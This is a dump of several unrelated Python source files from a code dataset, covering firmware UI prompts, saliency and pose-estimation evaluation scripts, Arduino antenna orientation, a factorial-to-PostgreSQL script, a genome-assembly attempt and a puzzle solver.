@Hannsek\n else:\n information.append(\n \"Position of individual numbers will change between entries for enhanced security.\"\n )\n verb = \"HOLD TO BEGIN\"\n\n return await confirm_action(\n ctx,\n br_type,\n \"\",\n description=\"\\n\\r\".join(information),\n verb=verb,\n hold=True,\n br_code=br_code,\n )\n\n\nasync def mnemonic_word_entering(ctx: GenericContext) -> None:\n await confirm_action(\n ctx,\n \"request_word\",\n \"WORD ENTERING\",\n description=\"You'll only have to select the first 2-3 letters.\",\n verb=\"CONTINUE\",\n verb_cancel=None,\n br_code=ButtonRequestType.MnemonicInput,\n )\n","repo_name":"Migos24/firmware-master","sub_path":"firmware-master/core/src/trezor/ui/layouts/tr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":36434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71211526313","text":"import argparse\nimport os\nfrom dataset import get_loader, get_loader_test\nfrom solver import Solver\n\n\ndef main(config):\n if config.mode == 'train':\n pass\n elif config.mode == 'test':\n test_loader = get_loader_test(config.test_path, config.test_label, config.img_size, config.batch_size,\n mode='test',\n filename=config.test_file, num_thread=config.num_thread)\n if not os.path.exists(config.test_fold): os.mkdir(config.test_fold)\n test = Solver(None, None, test_loader, config)\n test.test()\n\n else:\n raise IOError(\"illegal input!!!\")\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n \n # Hyper-parameters\n parser.add_argument('--n_color', type=int, default=3)\n parser.add_argument('--lr', type=float, default=3e-3)\n parser.add_argument('--clip_gradient', type=float, default=1.0)\n parser.add_argument('--cuda', type=bool, default=True)\n\n # Training settings\n parser.add_argument('--multi_gpu', type=bool, default=True)\n parser.add_argument('--vgg', type=str, default='')\n parser.add_argument('--train_path', type=str, default='')\n parser.add_argument('--label_path', type=str, default='')\n parser.add_argument('--img_size', type=int, default=None) # 256\n parser.add_argument('--epoch', type=int, default=100)\n parser.add_argument('--batch_size', type=int, default=1) # 8\n parser.add_argument('--val', type=bool, default=True)\n parser.add_argument('--val_path', type=str, default='')\n parser.add_argument('--val_label', type=str, default='')\n\n parser.add_argument('--num_thread', type=int, default=4)\n parser.add_argument('--load', type=str, default='')\n parser.add_argument('--save_fold', type=str, default='./results')\n parser.add_argument('--epoch_val', type=int, default=1)\n parser.add_argument('--epoch_save', type=int, default=1)\n parser.add_argument('--epoch_show', type=int, default=1)\n parser.add_argument('--pre_trained', type=str, default=None)\n\n # Testing settings\n parser.add_argument('--backbone', type=str, default='Res18') # Res18, Res18Fixed\n parser.add_argument('--test_path', type=str, default='')\n parser.add_argument('--test_label', type=str, default='')\n parser.add_argument('--test_file', type=str, default=None)\n parser.add_argument('--model', type=str, default='')\n parser.add_argument('--test_fold', type=str, default='')\n parser.add_argument('--use_crf', type=bool, default=False)\n\n # Misc\n parser.add_argument('--mode', type=str, default='test', choices=['train', 'test'])\n parser.add_argument('--visdom', type=bool, default=False)\n\n config = parser.parse_args()\n if config.test_file is None:\n if 'SALICON/images/test' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_SALICON')\n elif 'SALICON/images/val' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Val_SALICON')\n elif 'MIT1003/val' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Val_MIT1003')\n elif 'MIT1003/all' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'All_MIT1003')\n elif 'MIT300' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_MIT300')\n elif 'CAT2000' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_CAT2000')\n elif 'PseudoSal' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Val_PseudoSal')\n elif 'DUT-OMRON' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_DUT-OMRON')\n elif 'PASCAL-S' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_PASCAL-S')\n elif 'TORONTO' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_TORONTO')\n else:\n raise NotImplementedError\n else:\n if 'Eye_Fixation_Test_SALICON' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_SALICON')\n elif 'Eye_Fixation_Val_SALICON' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Val_SALICON')\n elif 'Eye_Fixation_Val_MIT1003' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Val_MIT1003')\n elif 'Eye_Fixation_All_MIT1003' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'All_MIT1003')\n elif 'Eye_Fixation_Test_MIT300' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_MIT300')\n elif 'Eye_Fixation_Test_CAT2000' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_CAT2000')\n elif 'Val_Eye_Fixation_PseudoSal_all' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Val_PseudoSal')\n elif 'Eye_Fixation_Train_DUT-OMRON' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_DUT-OMRON')\n elif 'Eye_Fixation_Train_PASCAL-S' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_PASCAL-S')\n elif 'Eye_Fixation_Train_TORONTO' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_TORONTO')\n else:\n raise NotImplementedError\n\n if not os.path.exists(config.save_fold): os.mkdir(config.save_fold)\n main(config)\n","repo_name":"gqding/SalFBNet","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"fa","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"30151286640","text":"\nfrom torch.utils.data import DataLoader\nimport copy\nfrom progress.bar import Bar\nimport config\nimport os\nimport numpy as np\nimport torch\nimport cv2\nimport matplotlib.pyplot as plt\nfrom utils import torch_op\nimport util\nfrom RPModule.rpmodule import RelativePoseEstimation,getMatchingPrimitive,RelativePoseEstimation_helper\nfrom RPModule.rputil import opts\nimport argparse\nfrom model.mymodel import SCNet\nimport time\nfrom baselines import super4pcs, open3d_global_registration, open3d_fast_global_registration,open3d_color_registration\nfrom open3d import *\nimport logging\n\n\ndef getLoader(args):\n testOption='test'\n if 'suncg' in args.dataList:\n from datasets.SUNCG import SUNCG as Dataset\n dataset_name='suncg'\n val_dataset = Dataset(testOption, nViews=config.nViews,meta=False,rotate=False,rgbd=True,hmap=False,segm=True,normal=True,list_=f\"./data/dataList/{args.dataList}.npy\",singleView=0,entrySplit=args.entrySplit)\n elif 'matterport' in args.dataList:\n from datasets.Matterport3D import Matterport3D as Dataset\n dataset_name='matterport'\n val_dataset = Dataset(testOption, nViews=config.nViews,meta=False,rotate=False,rgbd=True,hmap=False,segm=True,normal=True,list_=f\"./data/dataList/{args.dataList}.npy\",singleView=0,entrySplit=args.entrySplit)\n elif 'scannet' in args.dataList:\n from datasets.ScanNet import ScanNet as Dataset\n dataset_name='scannet'\n val_dataset = Dataset(testOption, nViews=config.nViews,meta=False,rotate=False,rgbd=True,hmap=False,segm=True,normal=True,list_=f\"./data/dataList/{args.dataList}.npy\",singleView=0,fullsize_rgbdn=True,entrySplit=args.entrySplit,representation=args.representation)\n if args.debug:\n loader = DataLoader(val_dataset, batch_size=1, shuffle=False,drop_last=True,collate_fn=util.collate_fn_cat, worker_init_fn=util.worker_init_fn)\n else:\n loader = DataLoader(val_dataset, batch_size=1, shuffle=False,num_workers=1,drop_last=True,collate_fn=util.collate_fn_cat, worker_init_fn=util.worker_init_fn)\n return dataset_name,loader\n\ndef _parse_args():\n \n parser = argparse.ArgumentParser(description='Optional app description')\n parser.add_argument('--dataList', type = str, default = 'matterport3dv1', help = 'options: suncgv3,scannetv1,matterport3dv1')\n parser.add_argument('--sigmaDist',type=float, default=0.04, help = 'parameter for our pairwise matching algorithm')\n parser.add_argument('--sigmaAngle1',type=float, default=0.2615,help = 'parameter for our pairwise matching algorithm')\n parser.add_argument('--sigmaAngle2',type=float, default=0.2615, help = 'parameter for our pairwise matching algorithm')\n parser.add_argument('--sigmaFeat',type=float, default=0.01, help = 'parameter for our pairwise matching algorithm')\n parser.add_argument('--maxIter',type=int,default=1000, help = 'number of pairs to be tested')\n parser.add_argument('--outputType',type=str,default='rgbdnsf', help = 'types of output')\n parser.add_argument('--debug',action='store_true', help = 'for debug')\n parser.add_argument('--exp',type=str,default='', help = 'will create a folder with such name under experiments/')\n parser.add_argument('--snumclass',type=int,default=15, help = 'number of semantic class')\n parser.add_argument('--featureDim',type=int,default=32, help = 'feature dimension')\n parser.add_argument('--maskMethod',type=str,default='second',help='observe the second view')\n parser.add_argument('--d',type=str,default='', help = '')\n parser.add_argument('--entrySplit',type=int,default=None, help = 'use for parallel eval')\n parser.add_argument('--representation',type=str,default='skybox')\n parser.add_argument('--method',type=str,choices=['ours','ours_nc','ours_nr','super4pcs','fgs','gs','cgs'],default='ours',help='ours,super4pcs,fgs(fast global registration)')\n parser.add_argument('--useTanh', type = int, default = 1, help = 'whether to use tanh layer on feature maps')\n parser.add_argument('--saveCompletion', type = int, default = 1, help = 'save the completion result')\n parser.add_argument('--batchnorm', type = int, default = 1, help = 'whether to use batch norm in completion network')\n parser.add_argument('--skipLayer', type = int, default = 1, help = 'whether to use skil connection in completion network')\n parser.add_argument('--num_repeat', type = int, default = 1, help = 'repeat times')\n parser.add_argument('--rm',action='store_true',help='will remove previous evaluation named args.exp')\n parser.add_argument('--para', type = str, default=None,help = 'file specify parameters for pairwise matching module')\n parser.add_argument(\"-l\", \"--log\", dest=\"logLevel\", choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'], help=\"Set the logging level\")\n\n args = parser.parse_args()\n if args.d: os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.d\n args.alterStep = 1 if args.method == 'ours_nr' else 3\n args.completion = 0 if args.method == 'ours_nc' else 1\n args.snumclass = 15 if 'suncg' in args.dataList else 21\n if args.logLevel:\n logging.basicConfig(level=getattr(logging, args.logLevel))\n\n print(\"\\n parameters... *******************************\\n\")\n print(f\"evaluate on {args.dataList}\")\n print(f\"using method: {args.method}\")\n print(f\"mask method: {args.maskMethod}\")\n if 'ours' in args.method:\n print(f\"output type: {args.outputType}\")\n print(f\"semantic classes: {args.snumclass}\")\n print(f\"feature dimension: {args.featureDim}\")\n print(f\"skipLayer: {args.skipLayer}\")\n print(\"\\n parameters... *******************************\\n\")\n time.sleep(5)\n\n\n args.rpm_para = opts()\n \n args.perStepPara = False\n if args.para is not None:\n para_val = np.loadtxt(args.para).reshape(-1,4)\n args.rpm_para.sigmaAngle1 = para_val[:,0]\n args.rpm_para.sigmaAngle2 = para_val[:,1]\n args.rpm_para.sigmaDist = para_val[:,2]\n args.rpm_para.sigmaFeat = para_val[:,3]\n args.perStepPara = True\n else:\n if args.sigmaAngle1: args.rpm_para.sigmaAngle1 = args.sigmaAngle1\n if args.sigmaAngle2: args.rpm_para.sigmaAngle2 = args.sigmaAngle2\n if args.sigmaDist: args.rpm_para.sigmaDist = args.sigmaDist\n if args.sigmaFeat: args.rpm_para.sigmaFeat = args.sigmaFeat\n\n return args\n\nif __name__ == '__main__':\n \n args = _parse_args()\n log = logging.getLogger(__name__)\n\n if not os.path.exists(\"tmp/rpe\"):\n os.makedirs(\"tmp/rpe\")\n exp_dir = f\"tmp/rpe/{args.exp}\"\n if not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\n\n dataset_name,loader = getLoader(args)\n bar = Bar('Progress', max=len(loader))\n\n speedBenchmark=[]\n Overlaps = ['0-0.1','0.1-0.5','0.5-1.0']\n adstatsOverlaps = {it:[] for it in Overlaps}\n transstatsOverlaps = {it:[] for it in Overlaps}\n error_stats=[]\n if not args.rm:\n if os.path.exists(f\"{exp_dir}/{args.exp}.result.npy\"):\n error_stats+=np.load(f\"{exp_dir}/{args.exp}.result.npy\").tolist()\n n_run = len(error_stats)//100\n args.num_repeat -= n_run\n \n if 'ours' in args.method:\n # setup division point of outputs\n args.idx_f_start = 3+3+1+args.snumclass\n args.idx_f_end = args.idx_f_start + args.featureDim\n\n # initialize network and load checkpoint\n net=SCNet(args).cuda()\n try:\n if 'suncg' in args.dataList:\n checkpoint = torch.load('./data/pretrained_model/suncg.comp.pth.tar')\n elif 'matterport' in args.dataList:\n checkpoint = torch.load('./data/pretrained_model/matterport.comp.pth.tar')\n elif 'scannet' in args.dataList:\n checkpoint = torch.load('./data/pretrained_model/scannet.comp.pth.tar')\n except:\n raise Exception(\"please provide the pretrained model.\")\n\n state_dict = checkpoint['state_dict']\n net.load_state_dict(state_dict)\n net.cuda()\n\n for _ in range(args.num_repeat):\n\n for i, data in enumerate(loader):\n st = time.time()\n np.random.seed()\n\n # initialize data\n rgb,depth,R,Q,norm,imgPath,segm=data['rgb'],data['depth'],data['R'],data['Q'],data['norm'],data['imgsPath'],data['segm']\n # use origin size scan for baselines on scannet dataset \n if 'scannet' in args.dataList and 'ours' not in args.method:\n rgb,depth = data['rgb_full'], data['depth_full']\n R = torch_op.npy(R)\n rgb = torch_op.npy(rgb*255).clip(0,255).astype('uint8')\n norm = torch_op.npy(norm)\n depth = torch_op.npy(depth)\n segm = torch_op.npy(segm)\n \n R_src = R[0,0,:,:]\n R_tgt = R[0,1,:,:]\n R_gt_44 = np.matmul(R_tgt,np.linalg.inv(R_src))\n R_gt = R_gt_44[:3,:3]\n\n # generate source/target scans, point cloud\n depth_src,depth_tgt,normal_src,normal_tgt,color_src,color_tgt,pc_src,pc_tgt = util.parse_data(depth,rgb,norm,args.dataList,args.method)\n\n if len(pc_src) == 0 or len(pc_tgt)==0:\n print(f\"this point cloud file contain no point\")\n continue\n\n # compute overlap and other stats\n overlap_val,cam_dist_this,pc_dist_this,pc_nn = util.point_cloud_overlap(pc_src, pc_tgt, R_gt_44)\n overlap = '0-0.1' if overlap_val <= 0.1 else '0.1-0.5' if overlap_val <= 0.5 else '0.5-1.0'\n\n # do not test non-overlap with traditional method since make no sense.\n if args.method in ['fgs','gs','super4pcs','cgs'] and overlap_val < 0.1:\n continue\n\n # select which method to evaluate\n if args.method == 'super4pcs':\n R_hat = super4pcs(pc_src, pc_tgt)\n elif args.method == 'fgs':\n R_hat = open3d_fast_global_registration(pc_src,pc_tgt)\n elif args.method == 'gs':\n R_hat = open3d_global_registration(pc_src,pc_tgt)\n elif args.method == 'cgs':\n R_hat = open3d_color_registration(pc_src,pc_tgt, color_src,color_tgt)\n elif 'ours' in args.method:\n with torch.set_grad_enabled(False):\n\n data_s = {'rgb': rgb[0,0,:,:,:].transpose(1,2,0),\n 'depth': depth[0,0,:,:],\n 'normal':norm[0,0,:,:,:].transpose(1,2,0),\n 'R': R[0,0,:,:]}\n data_t = {'rgb': rgb[0,1,:,:,:].transpose(1,2,0),\n 'depth': depth[0,1,:,:],\n 'normal':norm[0,1,:,:,:].transpose(1,2,0),\n 'R': R[0,1,:,:]}\n\n R_hat = np.eye(4)\n\n # get the complete scans\n complete_s=torch.cat((torch_op.v(data['rgb'][:,0,:,:,:]),torch_op.v(data['norm'][:,0,:,:,:]),torch_op.v(data['depth'][:,0:1,:,:])),1)\n complete_t=torch.cat((torch_op.v(data['rgb'][:,1,:,:,:]),torch_op.v(data['norm'][:,1,:,:,:]),torch_op.v(data['depth'][:,1:2,:,:])),1)\n\n # apply the observation mask\n view_s,mask_s,_ = util.apply_mask(complete_s.clone(),args.maskMethod)\n view_t,mask_t,_ = util.apply_mask(complete_t.clone(),args.maskMethod)\n mask_s=torch_op.npy(mask_s[0,:,:,:]).transpose(1,2,0)\n mask_t=torch_op.npy(mask_t[0,:,:,:]).transpose(1,2,0)\n\n # append mask for valid data\n tpmask = (view_s[:,6:7,:,:]!=0).float().cuda()\n view_s=torch.cat((view_s,tpmask),1)\n tpmask = (view_t[:,6:7,:,:]!=0).float().cuda()\n view_t=torch.cat((view_t,tpmask),1)\n\n for alter_ in range(args.alterStep):\n \n # warp the second scan using current transformation estimation\n view_t2s=torch_op.v(util.warping(torch_op.npy(view_t),np.linalg.inv(R_hat),args.dataList))\n view_s2t=torch_op.v(util.warping(torch_op.npy(view_s),R_hat,args.dataList))\n # append the warped scans\n view0 = torch.cat((view_s,view_t2s),1)\n view1 = torch.cat((view_t,view_s2t),1)\n\n # generate complete scans\n f=net(torch.cat((view0,view1)))\n f0=f[0:1,:,:,:]\n f1=f[1:2,:,:,:]\n \n data_sc,data_tc={},{}\n # replace the observed region with observed depth/normal\n data_sc['normal'] = (1-mask_s)*torch_op.npy(f0[0,3:6,:,:]).transpose(1,2,0)+mask_s*data_s['normal']\n data_tc['normal'] = (1-mask_t)*torch_op.npy(f1[0,3:6,:,:]).transpose(1,2,0)+mask_t*data_t['normal']\n data_sc['normal']/= (np.linalg.norm(data_s['normal'],axis=2,keepdims=True)+1e-6)\n data_tc['normal']/= (np.linalg.norm(data_t['normal'],axis=2,keepdims=True)+1e-6)\n data_sc['depth'] = (1-mask_s[:,:,0])*torch_op.npy(f0[0,6,:,:])+mask_s[:,:,0]*data_s['depth']\n data_tc['depth'] = (1-mask_t[:,:,0])*torch_op.npy(f1[0,6,:,:])+mask_t[:,:,0]*data_t['depth']\n data_sc['obs_mask'] = mask_s.copy()\n data_tc['obs_mask'] = mask_t.copy()\n data_sc['rgb'] = (mask_s*data_s['rgb']).astype('uint8')\n data_tc['rgb'] = (mask_t*data_t['rgb']).astype('uint8')\n \n # for scannet, we use the original size rgb image(480x640) to extract sift keypoint\n if 'scannet' in args.dataList:\n data_sc['rgb_full'] = (torch_op.npy(data['rgb_full'][0,0,:,:,:])*255).astype('uint8')\n data_tc['rgb_full'] = (torch_op.npy(data['rgb_full'][0,1,:,:,:])*255).astype('uint8')\n data_sc['depth_full'] = torch_op.npy(data['depth_full'][0,0,:,:])\n data_tc['depth_full'] = torch_op.npy(data['depth_full'][0,1,:,:])\n \n # extract feature maps\n f0_feat=f0[:,args.idx_f_start:args.idx_f_end,:,:]\n f1_feat=f1[:,args.idx_f_start:args.idx_f_end,:,:]\n data_sc['feat']=f0_feat.squeeze(0)\n data_tc['feat']=f1_feat.squeeze(0)\n\n # run relative pose module to get next estimate\n if args.perStepPara:\n para_this = opts(args.rpm_para.sigmaAngle1[alter_],args.rpm_para.sigmaAngle2[alter_],args.rpm_para.sigmaDist[alter_],args.rpm_para.sigmaFeat[alter_])\n else:\n para_this = args.rpm_para\n\n pts3d,ptt3d,ptsns,ptsnt,dess,dest,ptsW,pttW = getMatchingPrimitive(data_sc,data_tc,dataset_name,args.representation,args.completion)\n # early return if too few keypoint detected\n if pts3d is None or ptt3d is None or pts3d.shape[0]<2 or pts3d.shape[0]<2:\n logging.info(f\"no pts detected or less than 2 keypoint detected, return identity: {np.eye(3)}\")\n R_hat = np.eye(4)\n else:\n R_hat = RelativePoseEstimation_helper({'pc':pts3d.T,'normal':ptsns,'feat':dess,'weight':ptsW},{'pc':ptt3d.T,'normal':ptsnt,'feat':dest,'weight':pttW},para_this)\n\n # average speed\n time_this = time.time()-st\n speedBenchmark.append(time_this)\n \n # compute rotation error and translation error\n t_hat = R_hat[:3,3]\n R_hat = R_hat[:3,:3]\n \n ad_this = util.angular_distance_np(R_hat, R_gt[np.newaxis,:,:])[0]\n ad_blind_this = util.angular_distance_np(R_gt[np.newaxis,:,:],np.eye(3)[np.newaxis,:,:])[0]\n translation_this = np.linalg.norm(np.matmul((R_hat - R_gt_44[:3,:3]),pc_src.mean(0).reshape(3)) + t_hat - R_gt_44[:3,3])\n translation_blind_this = np.linalg.norm(t_hat - R_gt_44[:3,3])\n\n # save result for this pair\n R_pred_44=np.eye(4)\n R_pred_44[:3,:3]=R_hat\n R_pred_44[:3,3]=t_hat\n error_stats.append({'img_src':imgPath[0][0],'img_tgt':imgPath[1][0], 'err_ad':ad_this,\n 'err_t':translation_this,'err_blind':ad_blind_this,'err_t_blind':translation_blind_this,'overlap':overlap_val,'pc_dist':pc_dist_this,\n 'cam_dist':cam_dist_this,'pc_nearest':pc_nn,'R_gt':R_gt_44,'R_pred_44':R_pred_44})\n \n # update statics\n adstatsOverlaps[overlap].append(ad_this)\n transstatsOverlaps[overlap].append(translation_this)\n\n # print log\n log.info(f\"average processing time per pair: {np.sum(speedBenchmark)/len(speedBenchmark)}\")\n log.info(f\"imgPath:{imgPath},R_hat:{R_hat}\")\n log.info(f\"ad/ad_blind this :{ad_this}/{ad_blind_this}\\n\")\n\n # print progress bar\n Bar.suffix = '{dataset:10}: [{0:3}/{1:3}] | Total: {total:} | ETA: {eta:}'.format(i, len(loader), total=bar.elapsed_td, eta=bar.eta_td,dataset=dataset_name)\n bar.next()\n if (i+1) % 100 == 0:\n np.save(f\"{exp_dir}/{args.exp}.result.npy\",error_stats)\n sss=''\n for overlap in Overlaps:\n sss += f\"rotation, overlap:{overlap},nobs:{len(adstatsOverlaps[overlap])}, mean:{np.mean(adstatsOverlaps[overlap])} \"\n print(sss)\n sss=''\n for overlap in Overlaps:\n sss += f\"translation, overlap:{overlap},nobs:{len(transstatsOverlaps[overlap])}, mean:{np.mean(transstatsOverlaps[overlap])} \"\n print(sss)\n\n if i == args.maxIter:\n break\n\n np.save(f\"{exp_dir}/{args.exp}.result.npy\",error_stats)\n","repo_name":"zhenpeiyang/RelativePose","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":18205,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"72"} +{"seq_id":"32534787950","text":"\"\"\" \nEsta version esta pensado en 2 programas principales: reorientacion y motorNorte.\n\n*reorientacion no tiene argumento. Solo enciende el magnetometro, toma un promedio sobre cada eje y calcula el angulo actual de la antena. Devuelve este ultimo redondeado.\n \n*motornorte(arg1,arg2):\nmotor recibe en arg1 el angulo actual del satelite a analizar y en arg2 el angulo\nazimutal de la antena.\nEste funciona con \"AutomatizacionV2.ino\" montado sobre dicha plaqueta.\nNo tiene valor de retorno.\n\nEsta funcion deberia correrse en un loop mientras el antena.py este corriendo.\nProbablemente no sean necesarias las lineas de coneccion a serial.\n\nLas instrucciones son enviada por serial como una cadena del estilo \"1,0\" y \"i,j\" con i = 2,3 y j un entero.\n\n\"\"\"\n\nimport numpy as np\nimport serial, time\nimport re\n\n#Correcion sobre grados calculados\ndef trunc(entrada):\n flot = entrada - int(entrada)\n if flot < 0.5:\n salida = int(entrada)\n elif flot >= 0.5:\n salida = int(entrada) + 1\n return salida\n\n\ndef reorientacion(arduino):\n #Inicia conexion con la plaqueta mediante USB:\n arduino.write(bytes('1,0', 'utf-8')) \n data = \"\"\n \n print(\"Escribiendo datos de la magnetización del IMU...\")\n for i in range(10):\n print(i)\n linea = arduino.readline().decode('utf-8')\n data = data +linea\n print(\"terminado\")\n\n\n data2=data.replace(';', '\\n').split('\\n')\n x = []\n y = []\n z = []\n\n rango = np.arange(0, len(data2), 3) \n rango = rango[0:-1]\n for j in rango:\n x =np.append(x, [float(data2[j])])\n y= np.append(y, [float(data2[j+1])])\n z= np.append(z, [float(data2[j+2])])\n\n print(\"Resultados (microTesla):\")\n\n mean_x =np.mean(x)\n mean_y =np.mean(y)\n print(mean_x,mean_y)\n print(\"Midiendo posicion relativa al norte\")\n\n import math\n fi_rad = math.atan(mean_x/mean_y)\n fi_grad_1 = fi_rad*180/math.pi \n if mean_x < 0:\n if mean_y> 0:\n fi_grad = fi_grad_1\n if mean_y < 0:\n fi_grad = fi_grad_1-180\n if mean_x > 0:\n if mean_y < 0:\n fi_grad = fi_grad_1+180\n if mean_y > 0:\n fi_grad = fi_grad_1\n\n print(\"El norte esta a \", str(round(fi_grad)), \"° respecto del eje x del IMU\")\n\n return trunc(fi_grad)\n\n\n\ndef motorNorte(angSat, angAct, arduino):\n\n unidad = 512/360\n deltaGrado = angSat - angAct \n grado = trunc(deltaGrado * unidad)\n\n if deltaGrado < 0: #Si el satelite se movio positivamente\n orden = '2,'+str(grado)\n print(orden) \n arduino.write(bytes(orden, 'utf-8'))\n\n elif deltaGrado > 0: #Si el satelite se movio negativamente\n orden = '3,'+str(grado) \n print(orden)\n arduino.write(bytes(orden, 'utf-8'))\n\n\n time.sleep(3)\n print('Reorientando...')\n\n#Estos son lineas de prueba, se pueden descomentar y correr simplemente este programa sin ningun otro\n\n#azimut = reorientacion()\n#print('azimut actual: ', azimut)\n#motorNorte(0, azimut)\n#motorNorte(50,60)\n\n","repo_name":"arellana/TeledeteccionIAFE","sub_path":"VersionFinal/Mediciones/programa2_v3.py","file_name":"programa2_v3.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12222587275","text":"from trading_engine import *\nfrom data_processing import DataProcessing\ndp = DataProcessing([])\n\n\nfilename = r'data for trading\\streaming live prices.csv'\ninit_flags_and_order_ids(filename)\n\nwhile True:\n crossover_strategy(filename)","repo_name":"kesler20/trading_bot","sub_path":"trading_bot_test.py","file_name":"trading_bot_test.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17417160106","text":"archivo=open(\"Factorial7.txt\",\"a\")\r\nimport psycopg2\r\n\r\ndef ingreso():\r\n try:\r\n entrada = int(input(\"Ingrese el numero que desea calcular:\"));\r\n \r\n except:\r\n print(\"Error, ingrese valores numericos\\n\")\r\n entrada=ingreso()\r\n return entrada\r\n\r\ndef verificar():\r\n entrada=ingreso()\r\n cociente, residuo = divmod(entrada, 7)\r\n\r\n if(residuo==0 and cociente>0):\r\n factorial = 1\r\n valor=entrada\r\n for i in range(entrada):\r\n factorial=factorial*entrada\r\n entrada=entrada-1\r\n \r\n\r\n conexion1 = psycopg2.connect(database=\"Prueba\", user=\"postgres\", password=\"usac21\")\r\n cursor1=conexion1.cursor()\r\n sql=\"insert into factorial7(valor, factorial) values (%s,%s)\"\r\n datos=(valor, factorial)\r\n cursor1.execute(sql, datos)\r\n conexion1.commit()\r\n conexion1.close() \r\n print (\"El fatorial es\",factorial,\"****Registro Almacenado****\\n\")\r\n \r\n\r\n \r\n elif(reciduo!=0 or cociente==0):\r\n print(\"El numero ingresado no es mutiplo de 7\\n\")\r\n\r\n \r\n\r\nverificar()\r\narchivo.close()\r\n","repo_name":"HeinzVelasquez/PAIE","sub_path":"Factorial mutiplo de 7.py","file_name":"Factorial mutiplo de 7.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43999573325","text":"\r\nfrom collections import defaultdict\r\nimport networkx as nx\r\nwith open('1-kmers.txt') as f:\r\n lines = f.read().splitlines()\r\n edges = list()\r\n for line in lines:\r\n edges.append( (line[0:(len(line)-1)],line[1:len(line)]))\r\n\r\nprint(edges)\r\n\r\ngraph = nx.Graph()\r\ngraph.add_edges_from(edges)\r\nprint(graph.edges())\r\nprint(graph.nodes())\r\n\r\ndegrees = defaultdict(int)\r\nfor k in graph:\r\n print(k)\r\n for v in graph[k]:\r\n print(v)\r\n degrees[k] += 1\r\n degrees[v] -= 1\r\nsource = [k for k, v in degrees.items() if v == 1]\r\nsinc = [k for k, v in degrees.items() if v == -1]\r\n#print 'source: %s, sinc: %s' % (source, sinc)\r\n\r\nif sinc in graph.nodes():\r\n graph.add_edge(sink,source)\r\nelse:\r\n graph.add_node(sink)\r\n graph.add_edge(sink,source)\r\n\r\ncycles = {}\r\nwhile graph:\r\n current = next(iter(graph))\r\n cycle = [current]\r\n cycles[current] = cycle\r\n while current in graph:\r\n next_ = graph[current][0]\r\n del graph[current][0]\r\n if len(graph[current]) == 0:\r\n del graph[current]\r\n current = next_\r\n cycle.append(next_)\r\n\r\n\r\ndef traverse(tree, root):\r\n out = []\r\n for r in tree[root]:\r\n if r != root and r in tree:\r\n out += traverse(tree, r)\r\n else:\r\n out.append(r)\r\n return out\r\n\r\ncycle = traverse(cycles, 0)\r\nfor i in range(1, len(cycle)):\r\n if cycle[i-1] == sinc and cycle[i] == source:\r\n boarder = i\r\npath = cycle[boarder:]+cycle[1:boarder]\r\nprint ('->'.join([str(i) for i in path]))","repo_name":"SparshAgarwal/BioInformatics","sub_path":"HW1/PA2.py","file_name":"PA2.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26679709830","text":"# Submission Link : https://leetcode.com/submissions/detail/230781316/\n\nclass Solution(object):\n def isAnagram(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n \n s = sorted(s)\n t = sorted(t)\n if s == t:\n return True\n else:\n return False\n \n","repo_name":"prateekiiest/Competitive-Programming-Algo-DS","sub_path":"LeetCode/valid_anagram.py","file_name":"valid_anagram.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"72582018474","text":"import math\nimport numpy\n\ndef lines():\n with open(\"5.txt\") as fp:\n return fp.readlines()\n\ndef process_lines():\n post = []\n for a in lines():\n post.append(a)\n return post\n\n# First 7 makes a binary number\n# Last 3 makes a binary number\n# first 7 times 8 is just move 3 digits to the left\n# So the whole thing is just a binary number\n\nlines = process_lines()\n\n# lines = [\"BFFFBBFRRR\", \"FFFBBBFRRR\", \"BBFFBBFRLL\", \"FBFBBFFRLR\"]\nres = []\n\n\nfor l in lines:\n r = l.replace('F', '0')\n r = r.replace('B', '1')\n r = r.replace('L', '0')\n r = r.replace('R', '1')\n\n res.append(int(r, 2))\nprint(max(res))\n 